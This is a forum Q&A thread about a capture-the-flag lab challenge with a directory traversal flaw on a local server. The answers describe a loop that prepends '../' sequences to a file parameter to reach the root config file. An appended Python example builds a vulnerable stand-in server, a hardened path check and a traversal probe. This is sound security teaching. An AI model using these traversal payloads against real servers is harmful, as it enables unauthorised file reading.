
How can you traverse directory to get to root in Python? I wrote some code using BeautifulSoup, but it says 'module not found'. So I have this:

#
# There is a directory traversal vulnerability in the
# following page http://127.0.0.1:8082/humantechconfig?file=human.conf
# Write a script which will attempt various levels of directory
# traversal to find the right amount that will give access
# to the root directory. Inside will be a human.conf with the flag.
#
# Note: The script can timeout if this occurs try narrowing
# down your search


import urllib.request
import os

req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf")
dirName = "/tmp"
def getListOfFiles(dirName):

    listOfFile = os.listdir(dirName)
    allFiles = list()

    for entry in listOfFile:
        # Create full path
        fullPath = os.path.join(dirName, entry)

        if os.path.isdir(fullPath):
            allFiles = allFiles + getListOfFiles(fullPath)
        else:
            allFiles.append(fullPath)

    return allFiles
listOfFiles = getListOfFiles(dirName)
print(listOfFiles)

for file in listOfFiles:
    if file.endswith(".conf"):
        with open(file, "r") as f:
            print(f.read())

This outputs:

/tmp/level-0/level-1/level-2/human.conf

User : Human 66

Flag: Not-Set (Must be Root Human)

However, if I change the URL to 'http://127.0.0.1:8082/humantechconfig?file=../../../human.conf' it gives me the output:

User : Human 66

Flag: Not-Set (Must be Root Human)




User : Root Human

Flag: Well done the flag is: {}

The level of directory traversal it is at fluctuates wildly, from /tmp/level-2 to /tmp/level-15; if it's at the one I wrote, then it says I'm 'Root Human'. But it won't give me the flag, despite the fact that I am suddenly 'Root Human'. Is there something wrong with the way I am traversing directory?

It doesn't seem to matter at all if I take away the req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf") line. How can I actually send the code to that URL? Thanks!

Ollie

1 Answer


Cyber Discovery Moon Base challenge? For this one, you need to keep adding '../' in front of human.conf (for example 'http://127.0.0.1:8082/humantechconfig?file=../human.conf') which becomes your URL. This URL you need to request (using urllib.request.urlopen(URL)). The main bit of the challenge is to attach the ../ multiple times which shall not be very hard using a simple loop. You don't need to use the OS. Make sure to break the loop once you find the flag (or it will go into an infinite loop and give you errors).

Aman Srii
  • You don't really need to encode it just add (concatenate - hint) the ../ to the url – ANdroid May 28 '20 at 17:33
  • I would like to leave some for you to work out... Also the way I used wasn't really the ideal way. I just did for x in range(some varying integers from 100 to 1000 here until I got the flag): – ANdroid May 28 '20 at 17:35
  • I said to remove all the code relating to the OS module... you just need to req = urllib.request.urlopen(http://127.0.0.1:8082/humantechconfig?file=../../../../../../[or as many times as it takes to get to the root directory]human.conf then req = req.read() then print(req) there is some fault in the way you are using urllib too. Try looking for a tutorial on urllib. The moon base level 3 challenge 3 helps too. – ANdroid May 28 '20 at 18:09
  • All you are doing at the moment is going back directories in the remote system that the python file is saved in. You need to go back directories in the server of the url. (in this case the remote system is the server of the url hence the similarity in 'The flag is: {}' but this is just a theory - I'm not sure...). – ANdroid May 28 '20 at 18:17
  • Got it!! Thanks very much! – Ollie May 28 '20 at 19:38
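The loop described in the answer, together with the server-side check that stops it, as an added example that is not code from the original posts or from the challenge. It runs against a constructed local stand-in server rather than the challenge host; `make_handler`, `probe` and `run` are hypothetical names, and the hardened branch is one assumed way to fix such a handler.

```python
import os, tempfile, threading
import urllib.error, urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

def make_handler(base, hardened):
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            name = parse_qs(urlparse(self.path).query).get("file", [""])[0]
            path = os.path.realpath(os.path.join(base, name))
            # Hardened: the resolved path must stay inside the served directory.
            allowed = not hardened or os.path.commonpath([path, base]) == base
            if allowed and os.path.isfile(path):
                with open(path, "rb") as f:
                    code, body = 200, f.read()
            else:
                code, body = 404, b"not found"
            self.send_response(code)
            self.end_headers()
            self.wfile.write(body)
        def log_message(self, *args):  # keep the demo quiet
            pass
    return Handler

def probe(base_url, max_depth):
    """First depth of '../' whose response names the root user, else None."""
    for depth in range(max_depth + 1):
        url = f"{base_url}/humantechconfig?file={'../' * depth}human.conf"
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                if b"Root Human" in resp.read():
                    return depth  # stop as soon as the root file is served
        except urllib.error.HTTPError:
            continue  # nothing at this depth; try the next one
    return None

def run(levels, hardened):
    """Constructed stand-in for the challenge: root/level-0/.../human.conf."""
    root = cwd = os.path.realpath(tempfile.mkdtemp())
    for i in range(levels):
        cwd = os.path.join(cwd, f"level-{i}")
        os.mkdir(cwd)
    for folder, user in ((cwd, "Human 66"), (root, "Root Human")):
        with open(os.path.join(folder, "human.conf"), "w") as f:
            f.write(f"User : {user}\n")
    srv = HTTPServer(("127.0.0.1", 0), make_handler(cwd, hardened))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    depth = probe(f"http://127.0.0.1:{srv.server_port}", max_depth=levels + 5)
    srv.shutdown()
    return depth
```

The `../` sequences are resolved by the server relative to its own directory, which is why walking the local filesystem with `os` never changes what the server returns.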